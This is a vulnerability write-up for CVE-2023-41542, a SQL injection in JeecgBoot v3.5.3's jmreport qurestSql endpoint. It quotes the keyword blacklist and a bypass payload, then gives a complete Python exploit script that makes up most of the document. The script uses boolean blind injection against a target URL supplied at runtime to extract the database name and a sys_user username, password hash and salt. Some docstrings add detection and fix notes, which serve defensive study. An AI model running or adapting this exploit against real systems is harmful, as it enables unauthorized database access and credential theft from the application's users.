CVE-2023-41542(JeecgBoot Sql Injection)

Description

JEECG Boot v3.5.3 was found to contain a SQL injection in /jeecg-boot/jmreport/qurestSql (the `id` field of the JSON request body is interpolated into a query).

Affected version

JeecgBoot <= v3.5.3

Vulnerability Analysis

The framework mitigated the original SQL injection by adding a keyword blacklist, which is as follows:

“exec|peformance_schema|information_schema|extractvalue|updatexml|geohash|gtid_subset|gtid_subtract| insert | alter | delete | grant | update | drop | chr | mid | master | truncate | char | declare |user()|”;

Therefore a payload built only from keywords that are not on the blacklist bypasses the existing protection, as mentioned in the report. A keyword denylist cannot cover every SQL construct, so it is not a reliable fix on its own; the payload from the report is:

1 'having {ascii}=(nullif (ascii (substring ((select database()), {place}, 1)), 0) or'

Exp

The complete exploit script is as follows:

import requests
import json

def get_database(url: str) -> None:
    """Recover the name of the current database via boolean-based blind SQL injection.

    Each request POSTs a JSON body to the jmreport ``qurestSql`` endpoint with an
    injected ``having`` clause in the ``id`` field. The oracle is whether ``result``
    in the JSON reply is null: the injected condition compares the ASCII value of
    one character of ``database()`` against a threshold, so a length probe followed
    by a binary search per position reconstructs the name one character at a time.

    Args:
        url: base URL of the target (scheme and host[:port]); the endpoint path is
            appended here.

    Returns:
        None. The recovered name is printed once complete.

    Raises:
        Whatever ``requests.post``, ``json.loads`` or ``res["result"]`` raise when
        the target is unreachable or the reply is not the expected JSON object;
        there is no error handling in this function.

    Defender notes: every probe carries the literal ``' having`` together with
    ``substring``/``ascii``/``nullif``/``select`` in the ``id`` field, the token
    headers are the string ``'null'``, and one character costs several requests,
    so a burst of POSTs to ``/jeecg-boot/jmreport/qurestSql`` with that body shape
    is the signature to alert on. None of those keywords appears in the
    framework's blacklist, which is why the denylist does not stop it; binding
    ``id`` as a query parameter instead of filtering keywords is the fix.
    """
    url=url+"/jeecg-boot/jmreport/qurestSql"  # endpoint path appended to the caller-supplied base
    # Browser-like headers; the token headers carry the string 'null', i.e. no real token is sent.
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Referer': 'http://localhost:8088/jeecg-boot/jmreport/list',
        'X-Access-Token': 'null',
        'token': 'null',
        'JmReport-Tenant-Id': 'null',
        'Content-Type': 'application/json',
        'Connection': 'close',
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'no-cors',
        'Sec-Fetch-Site': 'same-origin',
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache'
    }
    # payload = """{"apiSelectId":"1316997232402231298","id":"1' having 106=(nullif(ascii((substring((select database()),1,1))),0)) or '"}"""
    # NOTE: this assignment is dead -- it is a plain (non-f) string and the loop
    # below rebuilds ``payload`` before the first request.
    payload="""{"apiSelectId":"1316997232402231298","id":"1' having 32<(nullif(ascii((substring((select database()),{length},1))),0)) or '"}"""
    # Length probe: advance ``length`` while the condition "ascii(char at position
    # length) > 32" still yields a row; the first null ``result`` stops the loop,
    # so ``length`` ends one past the last character.
    length=1
    while True:
        payload=f"""{{"apiSelectId":"1316997232402231298","id":"1' having 32<(nullif(ascii((substring((select database()),{length},1))),0)) or '"}}"""
        response=requests.post(url,headers=headers,data=payload)
        res=json.loads(response.text)
        if res["result"]==None:  # ``is None`` is the idiom; comparison left unchanged
            break
        else:
            length+=1
    # Per-position binary search over the ASCII range [32, 128).
    database=""
    for place in range(1,length):
        min=32  # NOTE: ``min``/``max`` shadow the builtins for the rest of this loop body
        max=128
        mid=(min+max)//2
        while min<max:
            # A non-null ``result`` means ``mid < ascii(char)``, so the answer lies above mid.
            payload=f"""{{"apiSelectId":"1316997232402231298","id":"1' having {mid}<(nullif(ascii((substring((select database()),{place},1))),0)) or '"}}"""
            response=requests.post(url,headers=headers,data=payload)
            res=json.loads(response.text)
            if res["result"]!=None:
                min = mid + 1
            else:
                max = mid
            mid = (min + max) // 2
        # On exit min == max, so mid == min is the ASCII value of this character.
        database+=chr(mid)
    print(database)
def get_user_password(url: str) -> None:
    """Extract username, password hash and salt of one ``sys_user`` row via blind SQL injection.

    Uses the same boolean oracle as ``get_database``: each POST to the jmreport
    ``qurestSql`` endpoint injects a ``having`` clause into the ``id`` field, and a
    null ``result`` in the JSON reply means the injected condition was false. For
    each of the three columns a length probe is followed by a per-character binary
    search. ``limit 1,1`` selects the row at offset 1 (the second row in the
    table's default order).

    Args:
        url: base URL of the target (scheme and host[:port]); the endpoint path is
            appended here.

    Returns:
        None. The three recovered values are printed at the end.

    Raises:
        Whatever ``requests.post``, ``json.loads`` or ``res["result"]`` raise on an
        unreachable target or an unexpected reply; there is no error handling.

    Defender notes: the three extractions below are the same request pattern
    repeated, so the observable signature is a long run of POSTs to
    ``/jeecg-boot/jmreport/qurestSql`` whose body contains ``' having`` and
    ``select ... from sys_user``, with token headers set to the string ``'null'``.
    The body is three copies of one probe/search routine; nothing in it is
    protected by the keyword blacklist, which argues for a parameterized query
    on the server side rather than a longer denylist.
    """
    url=url+"/jeecg-boot/jmreport/qurestSql"  # endpoint path appended to the caller-supplied base
    # Browser-like headers; the token headers carry the string 'null', i.e. no real token is sent.
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Referer': 'http://localhost:8088/jeecg-boot/jmreport/list',
        'X-Access-Token': 'null',
        'token': 'null',
        'JmReport-Tenant-Id': 'null',
        'Content-Type': 'application/json',
        'Connection': 'close',
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'no-cors',
        'Sec-Fetch-Site': 'same-origin',
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache'
    }
    # --- username: length probe (stops at the first null ``result``; ``length``
    # ends one past the last character), then binary search per position.
    length=1
    while True:
        payload=f"""{{"apiSelectId":"1316997232402231298","id":"1' having 32<(nullif(ascii((substring((select username from sys_user limit 1,1),{length},1))),0)) or '"}}"""
        response=requests.post(url,headers=headers,data=payload)
        res=json.loads(response.text)
        if res["result"]==None:  # ``is None`` is the idiom; comparison left unchanged
            break
        else:
            length+=1
    username=""
    for place in range(1,length):
        min=32  # NOTE: ``min``/``max`` shadow the builtins for the rest of this loop body
        max=128
        mid=(min+max)//2
        while min<max:
            # A non-null ``result`` means ``mid < ascii(char)``, so the answer lies above mid.
            payload=f"""{{"apiSelectId":"1316997232402231298","id":"1' having {mid}<(nullif(ascii((substring((select username from sys_user limit 1,1),{place},1))),0)) or '"}}"""
            response=requests.post(url,headers=headers,data=payload)
            res=json.loads(response.text)
            if res["result"]!=None:
                min = mid + 1
            else:
                max = mid
            mid = (min + max) // 2
        # On exit min == max, so mid == min is the ASCII value of this character.
        username+=chr(mid)
    # --- password: same length probe and search, reading the ``password`` column.
    length=1
    while True:
        payload=f"""{{"apiSelectId":"1316997232402231298","id":"1' having 32<(nullif(ascii((substring((select password from sys_user limit 1,1),{length},1))),0)) or '"}}"""
        response=requests.post(url,headers=headers,data=payload)
        res=json.loads(response.text)
        if res["result"]==None:
            break
        else:
            length+=1
    password=""
    for place in range(1,length):
        min=32
        max=128
        mid=(min+max)//2
        while min<max:
            payload=f"""{{"apiSelectId":"1316997232402231298","id":"1' having {mid}<(nullif(ascii((substring((select password from sys_user limit 1,1),{place},1))),0)) or '"}}"""
            response=requests.post(url,headers=headers,data=payload)
            res=json.loads(response.text)
            if res["result"]!=None:
                min = mid + 1
            else:
                max = mid
            mid = (min + max) // 2
        password+=chr(mid)
    # --- salt: same length probe and search, reading the ``salt`` column.
    length=1
    while True:
        payload=f"""{{"apiSelectId":"1316997232402231298","id":"1' having 32<(nullif(ascii((substring((select salt from sys_user limit 1,1),{length},1))),0)) or '"}}"""
        response=requests.post(url,headers=headers,data=payload)
        res=json.loads(response.text)
        if res["result"]==None:
            break
        else:
            length+=1
    salt=""
    for place in range(1,length):
        min=32
        max=128
        mid=(min+max)//2
        while min<max:
            payload=f"""{{"apiSelectId":"1316997232402231298","id":"1' having {mid}<(nullif(ascii((substring((select salt from sys_user limit 1,1),{place},1))),0)) or '"}}"""
            response=requests.post(url,headers=headers,data=payload)
            res=json.loads(response.text)
            if res["result"]!=None:
                min = mid + 1
            else:
                max = mid
            mid = (min + max) // 2
        salt+=chr(mid)
    # Labels are Chinese: "username is", "password is", "salt is" (runtime string left unchanged).
    print("用户名为:"+username+"\n密码为:"+password+"\n盐为:"+salt)
# get_database("http://localhost:8088")
# Entry point. This runs at import time (no ``if __name__ == "__main__":`` guard):
# the base URL is read from stdin and only the ``sys_user`` extraction is invoked.
url=input("please input your target: (example:http://localhost:8088)")
# get_database(url)
get_user_password(url)

Author
Pho3n1x
Posted on
September 15, 2023